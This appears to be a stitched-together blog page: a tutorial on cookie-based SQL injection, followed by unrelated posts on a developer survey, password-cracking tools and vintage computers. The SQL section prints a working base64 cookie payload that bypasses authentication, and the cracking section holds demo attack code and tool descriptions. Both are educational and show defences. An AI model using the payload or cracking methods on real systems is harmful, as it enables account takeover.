
Session Cookie Based SQL Injection

Short description: SQL injection is one of the most dangerous attacks against web applications, and a large number of sites are still vulnerable to it. It comes in several variants: classic SQL injection, blind SQL injection, and cookie-based SQL injection. You already know the basic idea of cookies and why they matter: they carry session state, and they usually come up in security discussions in the context of cross-site scripting (XSS), where the goal is to steal them. Cookie-based SQL injection is different: the cookie value itself is the input that reaches a SQL query. That is what this article covers.

Did you say a “Cookie” 

A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to send state information to a user’s browser and for the browser to return the state information to the origin site. The state information can be used for authentication, identification of a user session, user’s preferences, shopping cart contents, or anything else that can be accomplished through storing text data.
Cookies are not software. They cannot be programmed, cannot carry viruses, and cannot install malware on the host computer. However, they can be used by spyware to track users’ browsing activities, a major privacy concern that prompted European and US lawmakers to take action. Cookies can also be stolen by attackers to gain access to a victim’s web account.[1]


Where can I find my cookies?


Here is one way to view your stored cookies in your browser. This method applies to Mozilla Firefox:


  1. From the Tools menu, select Options. If the menu bar is hidden, press Alt to make it visible.

  2. At the top of the window that appears, click Privacy.

  3. To modify settings, from the drop-down menu under “History”, select Use custom settings for history. Then enable or disable the settings by checking or unchecking the boxes next to each setting:


  • To allow sites to set cookies on your computer, select Accept cookies from sites. To specify which sites are always or never allowed to use cookies, click Exceptions.
  • To accept third-party cookies, check Accept third-party cookies. In the drop-down menu next to “Keep until:”, select the time period you wish to keep cookies on your computer.
  • To view the cookies stored on your computer, click Show Cookies… . In the window that appears, you can view the cookies on your computer, search for cookies, and remove any or all of the listed cookies.
  • To specify how the browser should clear the private data it stores, check Clear history when Firefox closes. Then, click Settings… . You can specify the items to be cleared when you close Firefox.

  4. Click OK until you return to the Firefox window.

To remove all cookies, from the Tools menu, select Clear recent history… . Check the items you want to clear, and then click Clear Now.



Are you talking about a Cookie Poisoning-like attack?


Cookie poisoning attacks involve modifying the contents of a cookie (data stored on the web user’s computer) in order to bypass security mechanisms. Using cookie poisoning, attackers can gain unauthorized information about another user and steal their identity.
Cookie poisoning is a known technique mainly for achieving impersonation and breach of privacy through manipulation of session cookies, which maintain the identity of the client. By forging these cookies, an attacker can impersonate a valid client and thus obtain information and perform actions on behalf of the victim. The ability to forge such session cookies (or more generally, session tokens) stems from the fact that the tokens are not generated in a secure way.[4]
To sum up, cookie-based SQL injection is not a kind of cookie poisoning. Poisoning forges a cookie’s value so that the application accepts it as someone else’s; injection uses the cookie merely as a transport for SQL that the application concatenates into a query.

Cookie variables as a vector of SQL Injections:


SQL injection overview

A SQL injection attack consists of the insertion or “injection” of SQL via the input data sent from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), recover the contents of a given file present on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
All data sent by the browser to a web application can be manipulated to inject SQL code if it is used in a SQL query: GET and POST parameters, cookies and other HTTP headers (User-Agent, Referer, X-Forwarded-For and so on). In CGI-style deployments some of these values also surface as environment variables. GET and POST parameters are typically entered through HTML forms, which can contain hidden fields, i.e. information that is in the form but not shown; GET parameters travel in the URL and POST parameters in the request body. With the growth of Web 2.0 technologies, GET and POST requests are also generated by JavaScript.

Injecting malicious code into a cookie:

Unlike other parameters, cookies are not supposed to be handled by users, so developers tend to trust them. Apart from session identifiers, which are (usually) random, cookies may contain data in the clear or encoded: hexadecimal, base64, hashes (MD5, SHA1), serialized structures. Encoding is not sanitization. If we can determine the encoding used, we decode the value, inject SQL into the field that reaches the query, and re-encode it.



    function is_user($user) {
        global $prefix, $db, $user_prefix;

        // The cookie is "uid:<unused>:pwd", base64-encoded. The array form is
        // used when the caller has already split it.
        if (!is_array($user)) {
            $user = base64_decode($user);
            $user = explode(":", $user);
            $uid = "$user[0]";
            $pwd = "$user[2]";
        } else {
            $uid = "$user[0]";
            $pwd = "$user[2]";
        }

        if ($uid != "" AND $pwd != "") {
            // $uid comes straight from the cookie and is interpolated into the
            // query with no escaping or casting: this is the injection point.
            $sql = "SELECT user_password FROM " . $user_prefix . "_users WHERE user_id='$uid'";
            $result = $db->sql_query($sql);
            $row = $db->sql_fetchrow($result);
            $pass = $row['user_password'];

            // Whatever the query returns is compared with the cookie's own pwd field.
            if ($pass == $pwd && $pass != "") {
                return 1;
            }
        }

        return 0;
    }

The cookie is the base64 encoding of three colon-separated fields: the user id, a middle field the function never reads, and the password. If we set the cookie to the base64 encoding of

    12345' UNION SELECT 'mypass::mypass

then $uid is 12345' UNION SELECT 'mypass (the application’s own closing quote terminates the string literal, so the payload must not end with a quote of its own), $pwd is mypass, and the SQL query becomes:


    SELECT user_password FROM nk_users WHERE user_id='12345' UNION SELECT 'mypass'

The UNION appends a row whose only column is the literal mypass. Provided no user has user_id 12345, the first (and only) row fetched is that literal, which equals the $pwd we put in the same cookie, so is_user() returns 1 and we are authenticated without knowing any real password.

How to inject the code in Cookies?

There are many HTTP interceptors and HTTP editors (an intercepting proxy, or the browser’s own developer tools) that let you modify the request before it is sent to the server. The tester then edits the Cookie header to carry the malicious SQL statement.
It works like GET/POST-based SQL injection, except that certain characters cannot appear literally. For example, ‘;’ and ‘,’ are delimiters in the Cookie header, so they end the injected value unless they are URL-encoded (%3B and %2C). In the example above the payload is base64-encoded, which sidesteps this: base64 output contains neither character.
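The two steps above (build the encoded cookie, see what query the server runs) can be reproduced end to end. The following is an added example, not code from the original post or from PHP-Nuke: a Python port of the vulnerable is_user() logic, driven by a cookie we build ourselves, beside a parameterized version of the same check. The database is an in-memory SQLite table standing in for nk_users, and its single row is constructed sample data.

```python
# Added example, not code from the original post or from PHP-Nuke: a Python
# re-implementation of the vulnerable is_user() logic, driven by a cookie we
# build ourselves, beside a parameterized version of the same check.
# The database is an in-memory SQLite table standing in for nk_users, and its
# single row is constructed sample data.
import base64
import hmac
import sqlite3
from urllib.parse import quote

# Constructed sample user: id 2 with some stored password value (the app
# compares against whatever it stores; here an md5-looking string).
SAMPLE_UID = "2"
SAMPLE_STORED_PASSWORD = "5f4dcc3b5aa765d61d8327deb882cf99"


def make_db() -> sqlite3.Connection:
    """Stand-in for the nk_users table the page's query reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nk_users (user_id TEXT, user_password TEXT)")
    conn.execute("INSERT INTO nk_users VALUES (?, ?)", (SAMPLE_UID, SAMPLE_STORED_PASSWORD))
    conn.commit()
    return conn


def build_cookie(uid: str, pwd: str) -> str:
    """Encode 'uid:<unused>:pwd' the way is_user() expects: base64 of three colon-separated fields."""
    return base64.b64encode(f"{uid}::{pwd}".encode()).decode()


def cookie_header_safe(value: str) -> str:
    """Percent-encode a raw cookie value so ';' and ',' cannot terminate it.
    Base64 output contains neither character, so our payload needs no escaping."""
    return quote(value, safe="")


def split_cookie(cookie: str):
    """Mirror of base64_decode() + explode(':') in the PHP code; returns (uid, pwd)."""
    parts = base64.b64decode(cookie).decode().split(":")
    return parts[0], parts[2]


def rendered_sql(cookie: str) -> str:
    """The query string the vulnerable code actually sends (uid interpolated verbatim)."""
    uid, _ = split_cookie(cookie)
    return f"SELECT user_password FROM nk_users WHERE user_id='{uid}'"


def is_user_vulnerable(conn: sqlite3.Connection, cookie: str) -> int:
    """Faithful port of is_user(): string-built query, result compared with the cookie's pwd."""
    uid, pwd = split_cookie(cookie)
    if uid == "" or pwd == "":
        return 0
    row = conn.execute(rendered_sql(cookie)).fetchone()
    stored = row[0] if row else ""
    return 1 if stored != "" and stored == pwd else 0


def is_user_fixed(conn: sqlite3.Connection, cookie: str) -> int:
    """Same check with uid bound as a parameter, so it can only ever match a user_id value.
    A type check (integer id) would be a further layer; the binding alone defeats the UNION."""
    try:
        uid, pwd = split_cookie(cookie)
    except (ValueError, IndexError, UnicodeDecodeError):
        return 0  # malformed base64, undecodable bytes, or too few fields
    if uid == "" or pwd == "":
        return 0
    row = conn.execute(
        "SELECT user_password FROM nk_users WHERE user_id = ?", (uid,)
    ).fetchone()
    stored = row[0] if row else ""
    return 1 if stored != "" and hmac.compare_digest(stored, pwd) else 0


if __name__ == "__main__":
    # Legitimate cookie for the sample user works against both versions.
    good = build_cookie(SAMPLE_UID, SAMPLE_STORED_PASSWORD)
    # Injected cookie: the app's own closing quote ends the literal, so no trailing quote here.
    evil = build_cookie("12345' UNION SELECT 'mypass", "mypass")
    print(rendered_sql(evil))
    print("vulnerable:", is_user_vulnerable(make_db(), good), is_user_vulnerable(make_db(), evil))
    print("fixed:     ", is_user_fixed(make_db(), good), is_user_fixed(make_db(), evil))
```

Running it prints the exact query shown above, then 1 1 for the vulnerable port (the forged cookie logs in) and 1 0 for the parameterized one (the forged uid is just a string that matches no row). The decoding step is unchanged in the fixed version; only the way the value reaches the query differs.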

Conclusion

Cookie variables are sometimes not properly sanitized before being used in a SQL query. This can be used to bypass authentication or run arbitrary SQL by injecting code into the cookie. The decoding step (base64, hex, serialization) is not a defence; it merely hides the injection point from casual inspection. The fix is the same as for every other injection: bind the value with a parameterized query or, at the very least, cast it to the expected type (an integer user id here). For web application audits, cookie variables should be added to the list of parameters to be checked.

For more Updates Visit: amadahmad.blogspot.com


Most Popular Programming Languages, Frameworks, Libraries, And Databases | 2017


Stack Overflow has released its much-anticipated Developer Survey 2017. This year, over 64,000 developers took part in the survey and shared their preferences. The survey revealed that for the fifth time in a row, JavaScript was the most commonly used programming language, followed by SQL and Java.
Stack Overflow is the world’s largest online community for programmers where they can learn languages, share code, and help each other. The website also releases its annual developer survey which gives a pretty solid idea of current programming trends, the work lives of developers, their habits and preferences, etc.
Stack Overflow has conducted this survey every year since 2011. This year’s is the biggest in its history, with 64,000 developers taking part. Over the next few days, I’ll be covering some of the major highlights of the survey.

Most popular programming languages:

For the fifth time in a row, JavaScript has topped the list of the most commonly used programming languages. JavaScript is followed by SQL and Java.
The growth of Python is notable. It has overtaken PHP for the first time in five years. Here’s the list of the most popular programming languages:

Most popular frameworks, libraries:

In this category, Node.js and AngularJS continue to be the most commonly used technologies:

Most popular databases:

For the first time in its survey, Stack Overflow asked the developers what databases they were using. MySQL and SQL Server turned out to be the biggest databases:


10 Best Password Cracking Tools Of 2016


Password cracking is an integral part of digital forensics and pentesting. Keeping that in mind, we have prepared a list of the top 10 best password cracking tools that are widely used by ethical hackers and cyber-security experts. These tools–including the likes of Aircrack, John the Ripper, and THC Hydra–use different algorithms and protocols to crack the passwords on a Windows, Linux, and OS X system.

What is password cracking?

In the field of cyber-security and cryptography, password cracking plays a major role. It is the process of recovering passwords from stored or captured data, either to breach a system or to restore access to it. You can compare it to repeatedly guessing a phone’s unlock pattern or PIN.
So, why learn about password cracking and the tools used for it? Password cracking is used to recover forgotten passwords for online accounts, computers and smartphones. It is also used by system administrators as a preventive measure: they audit their users’ password hashes on a regular basis to find the weak ones before an attacker does.
As for the process itself, most methods rely on a computer that generates a vast set of candidate passwords, hashes each one and compares it with the target. A single desktop GPU tests hundreds of millions to billions of candidates per second against fast, unsalted hashes such as MD5 or NTLM; a password cracking tool automates this and reports the candidates that match.
The time needed to crack a password grows with its length and the size of the character set it draws from: each extra character multiplies the number of candidates, so long passwords from a large alphabet resist guessing far longer. That is why users are advised to use long, complex passwords. Cracking speed also depends heavily on the hash function used to store the passwords. Slow, salted, work-factor functions such as bcrypt (or scrypt and Argon2) cut the attacker’s guess rate by orders of magnitude and are therefore preferred over fast general-purpose hashes like MD5 and SHA-1 for password storage.

Types of password cracking attacks:

Here I’ll list the types of password cracking attacks that attackers generally use:
  • Dictionary attack: tries each entry of a word list (common passwords, dictionary words, leaked passwords), usually with mangling rules (capitalisation, appended digits) to generate variants. Fast, but it only finds passwords a human would plausibly pick.
  • Brute force attack: tries every string over a chosen character set up to a given length, dictionary words or not. It is guaranteed to succeed eventually, but the number of candidates grows exponentially with length, so it is practical only for short passwords or very fast hashes; a mask attack narrows the space when part of the pattern is known.
  • Rainbow table attack: uses hashes precomputed in advance and stored compactly as chains (a time/memory trade-off), so the attack phase is a lookup rather than a computation. It works only against unsalted hashes: a per-user salt means the table would have to be rebuilt for every salt value.
There are other techniques that do not attack the hash at all, such as phishing, spidering, social engineering and shoulder surfing. Soon, I’ll be discussing them in detail in another article. So, let’s get started with our list of the best password cracking tools of 2016.
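To make the three attack types concrete, here is an added example (not code from the original article or from any of the tools listed below): a miniature dictionary attack, brute force and precomputed-table lookup run against constructed sample hashes using only the Python standard library, followed by the two defences mentioned above, a per-user salt and a slow work-factor hash. The word list, the salt and the target passwords are all made up for the demonstration.

```python
# Added example, not code from the original article or from any of the tools
# it lists: a miniature version of the three attack types above, run against
# constructed sample hashes, plus the two defences the text mentions
# (per-user salt and a slow hash). Standard library only.
import hashlib
import itertools
import string

# Constructed word list; real ones (rockyou and the like) run to millions of entries.
WORDLIST = ["password", "letmein", "qwerty", "dragon", "summer2016"]
ALNUM = string.ascii_lowercase + string.digits


def md5_hex(s: str) -> str:
    """Fast, unsalted hash: the kind every cracker below gets through quickest."""
    return hashlib.md5(s.encode()).hexdigest()


def dictionary_attack(target: str, words, hash_fn=md5_hex):
    """One hash per candidate word; finds only passwords that are in the list."""
    for w in words:
        if hash_fn(w) == target:
            return w
    return None


def brute_force(target: str, charset: str, max_len: int, hash_fn=md5_hex):
    """Exhaust every string over `charset` up to max_len characters."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(charset, repeat=n):
            cand = "".join(tup)
            if hash_fn(cand) == target:
                return cand
    return None


def keyspace(charset: str, max_len: int) -> int:
    """How many candidates brute_force() may have to hash (why length matters most)."""
    return sum(len(charset) ** n for n in range(1, max_len + 1))


def build_table(words, hash_fn=md5_hex) -> dict:
    """Precomputed hash -> plaintext map. A real rainbow table stores chains to
    save memory, but the principle is the same: hash once, look up many times."""
    return {hash_fn(w): w for w in words}


def table_lookup(table: dict, target: str):
    return table.get(target)


def salted_sha256(salt: str, pw: str) -> str:
    """Per-user salt: the same password hashes differently for every user, so a
    table precomputed without the salt never matches."""
    return hashlib.sha256((salt + pw).encode()).hexdigest()


def slow_hash(salt: str, pw: str, iterations: int = 10_000) -> str:
    """Work-factor hash (PBKDF2 here; bcrypt/scrypt/Argon2 in production). Each
    guess now costs `iterations` HMAC computations instead of one hash."""
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt.encode(), iterations).hex()


if __name__ == "__main__":
    print("dictionary:", dictionary_attack(md5_hex("dragon"), WORDLIST))
    print("brute force:", brute_force(md5_hex("ab1"), ALNUM, 3), "in a keyspace of", keyspace(ALNUM, 3))
    table = build_table(WORDLIST)
    print("table hit:", table_lookup(table, md5_hex("qwerty")))
    salt = "a3f9"  # constructed per-user salt
    print("table vs salted hash:", table_lookup(table, salted_sha256(salt, "qwerty")))
    # Salting forces the attacker back to hashing each guess with that salt;
    # a slow hash then makes every one of those guesses expensive.
    print("salted dictionary:", dictionary_attack(salted_sha256(salt, "qwerty"), WORDLIST,
                                                  lambda w: salted_sha256(salt, w)))
    print("slow-hash dictionary:", dictionary_attack(slow_hash(salt, "letmein"), WORDLIST,
                                                     lambda w: slow_hash(salt, w)))
```

The table lookup against the salted hash returns None while the salt-aware dictionary attack still succeeds: salting does not stop guessing, it only removes the precomputation shortcut. The slow hash is what makes each remaining guess costly, which is the point of the bcrypt recommendation above.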

Best Password Cracking Tools Of 2016:

Disclaimer: We are publishing this list just for educational purposes. We don’t promote malicious and unethical practices.

1) John the Ripper


John the Ripper is one of the most popular password cracking tools available. This free password cracker, chiefly written in C, bundles many crackers into one suite with customizable cracking modes.
Its ability to auto-detect password hash types makes it a preferred choice of ethical hackers for auditing password strength. A commercial version, John the Ripper Pro, is also available with more features and optimisations. Unlike Metasploit, which is maintained by Rapid7, John is an Openwall project.
Supported platforms: John the Ripper is available for all major platforms, including Linux, Windows, DOS, and OS X.
Download link: John the Ripper

2) Aircrack-ng


Aircrack-ng (ng stands for new generation) is one of the best-known tools for recovering Wi-Fi keys, the one people reach for to bump an annoying neighbour off their own Wi-Fi. Note that, just like John the Ripper, Aircrack-ng is not a single tool: it is a complete suite for monitoring, attacking and testing Wi-Fi networks.
The suite includes aircrack-ng itself, which recovers WEP keys and WPA/WPA2-PSK passphrases: WEP by statistical analysis of captured encrypted packets, WPA/WPA2 by a dictionary attack against a captured four-way handshake.
For WEP it uses the well-known FMS and KoreK attacks as well as the PTW attack, which needs far fewer captured initialization vectors to recover the key.
Supported platforms: Aircrack-ng is available for Linux, OpenBSD, FreeBSD, OS X, Windows, Android
Download link: Aircrack-ng

3) RainbowCrack


As the name suggests, RainbowCrack uses rainbow tables to crack password hashes: a large-scale time-memory trade-off in which the expensive hashing is done once, in advance, and stored. You can use either the command-line or the graphical interface.
Once the precomputation stage is complete, lookups are hundreds of times faster than a brute force over the same keyspace. You also do not need to generate the tables yourself: the developers make ready-made tables for LM, NTLM, MD5 and SHA1 available for download. Remember that tables are useless against salted hashes.
RainbowCrack also offers GPU acceleration, offloading the runtime computation to GPUs and reducing the cracking time further.
Supported platforms: RainbowCrack is available for Windows and Linux
Download link: RainbowCrack

4) Cain and Abel


This renowned password cracking tool is dependable software for recovering various types of passwords using multiple techniques. Cain and Abel lets you perform dictionary, brute-force and cryptanalysis attacks against captured password hashes.
This multi-purpose tool also sniffs networks, records VoIP conversations, recovers network keys, decodes scrambled passwords, and analyzes routing protocols.
Cain and Abel has two components: Cain, the front-end application that recovers passwords and performs sniffing, and Abel, a Windows NT service installed on a target machine that gives Cain a remote console there (for example, to dump password hashes).
Supported Platforms: Cain and Abel is available for Windows
Download link: Cain and Abel

5) THC Hydra


Unlike most of the other tools in this list, THC Hydra is an online cracker: it performs fast brute-force and dictionary attacks against login services over numerous network protocols, including Asterisk, FTP, HTTP-Proxy, MySQL, XMPP, Telnet and many more.
This free tool helps pentesters and security researchers find out how easy it would be to gain remote access to a system. New protocol modules can be added to extend it, and you can take part in its development via its GitHub page.
Supported Platforms: THC Hydra is available for Windows, Linux, Solaris, FreeBSD, OS X
Download link: THC Hydra

6) HashCat


Hashcat describes itself as the fastest and most advanced password recovery utility available. Released as free and open source software, it supports hash types such as MD4, MD5, Microsoft LM, the SHA family, MySQL, Cisco PIX, and Unix crypt formats.
Historically it came in a CPU version (hashcat) and GPU versions (oclHashcat for OpenCL and cudaHashcat for CUDA); since version 3.0 these are a single hashcat binary that runs on CPUs and GPUs alike through OpenCL. With its well-documented GPU acceleration, many algorithms can be cracked very quickly.
Its attack modes include straight (dictionary), combinator, brute force, mask, hybrid (dictionary plus mask), fingerprint, permutation, table-lookup and PRINCE attacks.
Supported Platforms: HashCat is available for Windows, Linux, OS X
Download link: HashCat

7) Crowbar


Crowbar is a brute forcing tool popular in the pentesting scene because it targets authentication methods other tools rarely cover. Where most SSH brute forcers try username and password pairs, Crowbar authenticates with SSH private keys collected during an engagement.
Currently Crowbar supports OpenVPN, Remote Desktop Protocol (with NLA), SSH private key authentication, and VNC key authentication.
Supported Platforms: Crowbar is available for Windows, Linux, OS X
Download link: Crowbar

8) OphCrack



Just like RainbowCrack, OphCrack is another popular free password cracking tool that uses rainbow tables to crack password hashes. It is widely used to crack Windows log-in passwords (LM and NTLM hashes). Thanks to its ability to import hashes from multiple formats and sources, OphCrack can recover the passwords of a Windows computer in a few minutes.
Available conveniently as a Live CD, a pentester can use it and leave no trace behind. For cracking Windows XP, Vista, and 7, one can also grab freely available rainbow tables. For professional use, larger tables are available for purchase.
Supported Platforms: OphCrack is available for Windows
Download link: OphCrack

9) L0phtCrack


Just like OphCrack, L0phtCrack is known for cracking Windows passwords. Besides a wide set of attacks (dictionary, hybrid, brute force and rainbow tables), it can also obtain the hashes itself, for instance by sniffing them off the network or dumping them from a system.
It can target Windows desktops, networked servers, Active Directory and domain controllers, and its scheduled-audit function lets you run password audits at a convenient time.
Supported Platforms: L0phtCrack is available for Windows
Download link: L0phtCrack

10) DaveGrohl


For Mac OS X, DaveGrohl is an open source password cracking tool that’s preferred by the Apple security experts. With a completely modern object-oriented codebase in Version 3.0, DaveGrohl has been made more useful for developers and users.
With the help of dictionary and incremental attacks, this tool lets you crack a password in minutes. Its distributed mode allows you to perform attacks using different computers and crack the same password hash for faster results.
Supported Platforms: DaveGrohl is available for OS X
Download link: DaveGrohl

10 Most Popular Computers In The History Of Computing



Some of the most popular computers in computing history have left their mark as the most memorable machines the world has seen. Some of them made history but did not survive it. Read on to learn which computers were the kings of a past era.
When personal computers appeared almost half a century ago, customers did not have the choice they have now. Options were limited and, on top of that, a buyer had to commit to the kind of software that would run on that PC for the next few years. So only a few PCs became favourites among computer users.

Here is a list of 10 Most Popular Computer In Computer History:

  • Timex Sinclair 1000

In 1981, Sinclair released a computer at a price of $100. This small computer, also known as the ZX81, ran on BASIC with just 2KB of RAM and 3.25 MHz processor. However, it made a perfect entry point for aspiring hobbyists who couldn’t spend a thousand dollars on a PC. With this price, the Timex Sinclair 1000 sold over 600,000 units in the United States and became one of the most popular computers of its time.
  • Tandy TRS-80

The Tandy TRS-80 was launched in 1977. Its first model offered 4K of RAM, a 1.77 MHz processor and a 12-inch monitor for $600. Later TRS-80 models greatly increased the computer’s capabilities, adding floppy support, extra ports, and more memory. Its operating system, TRS-DOS (disk operating system), was among the most popular microcomputer operating systems predating MS-DOS. Tandy sold more than 200,000 units.
  • MSX

While the computer revolution in the United States and Europe was driven by companies like IBM, Commodore, Sinclair and Apple, Japan had its own hardware. MSX (the name is commonly expanded as Microsoft Extended BASIC) was not a single machine but a standard implemented by a number of similar systems from Japanese companies such as Toshiba and Sony. MSX machines were the most popular computers in Japan in those days.
  • NEC PC-98

If MSX was the most popular computer in Japan then NEC’s PC-98 was a big success in itself. NEC PC-98 was released in 1982. It ran on a 5 MHz Intel 8086 CPU, had two display controllers, and a base 128KB of RAM. The PC-98 was a powerful computer for its time, and NEC ruled the Japanese market with roughly a 50 percent market share.
  • iMac (One of the most popular computers)

The iMac became popular almost instantly once Apple began advertising it on its distinctiveness. When the iMac was released in 1998, the ads set its colourful body against the drab beige of PCs. It is a simple all-in-one design that incorporates all of the computer’s components into the monitor housing: easy to move, easy to set up.
  • Commodore Amiga

The Commodore Amiga followed the grand success of computers like the Commodore 64 and Apple II; the first model, the Amiga 1000, appeared in 1985, and the Amiga 500 in 1987. It was newer, faster, better. The Amiga made the jump from an 8-bit CPU to the 16/32-bit Motorola 68000 running at about 7 MHz. The Amiga 500 shipped with 512KB of RAM, support for up to 4096 colours, and an internal 3.5-inch floppy drive, at a launch price of around $700.
  • Apple II (One of the most popular computers)

The Apple II was released in 1977, the same year as the Tandy TRS-80. This second computer from Apple was a great success even though it cost about $1300. It built on the design of the Apple I, keeping a simple 1MHz processor and 4KB of RAM and adding a case and keyboard.
  • ZX Spectrum

The ZX Spectrum was a huge success in the UK and eventually the most popular computer of its time there. Launched in 1982, it followed the ZX81’s formula: a small, affordable (£125 in the UK) system with the keyboard built into its body. But the Spectrum was a much better computer than its predecessor, thanks to 16KB (or 48KB) of RAM, colour graphics, and a proper keyboard in place of the ZX81’s membrane.
  • IBM PC: (One of the most popular computers)

The IBM PC can be called the first generation of the PC platform that still dominates the market today. The Intel-based, Windows-running computers that have dominated since the 1990s descend from the IBM PC of 1981.
Within a few years, all x86 computers — those using Intel’s processors — were compatible with the IBM PC and virtually identical to IBM’s design. They all ran MS-DOS, and the x86 PC field went on to become the de facto standard.
  • Commodore 64:

The Commodore 64 is the single most popular computer system ever sold. Released in 1982, the Commodore 64 had a 1MHz CPU but it came with two big draws:
  • A powerful, programmable sound chip and,
  • powerful graphics for a 1982 computer.
What made it stand out from the crowd was its reasonable cost of $595, its 64KB of RAM, and the fact that it could be plugged into a TV, making it a hybrid computer/video game console.
If you also know the most popular computer of its time which made a difference and you would like to share about that, you can put your views in the comments below. Also, don’t forget to mention your first machine’s specification.